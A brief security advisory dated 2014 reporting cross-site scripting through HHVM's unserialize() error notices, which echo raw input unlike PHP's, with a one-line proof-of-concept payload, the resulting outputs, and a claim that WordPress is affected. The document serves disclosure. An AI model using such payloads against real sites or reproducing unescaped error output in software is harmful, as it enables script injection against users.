pch-016.md
February 16, 2015 ยท View on GitHub
XSS via Error Reporting Notices in HHVM's unserialize() Function
Taoguang Chen <@chtg> - 2014.10.31
<?php
unserialize('<script>alert(/xss/)</script>');
The outputs in PHP:
Notice: unserialize(): Error at offset 0 of 29 bytes in ...
The outputs in HHVM:
Notice: Unable to unserialize: [<script>alert(/xss/)</script>]. Expected ':' but got 's'. in ...
This issue can be exploited on a number of popular applications, such as: WordPress :)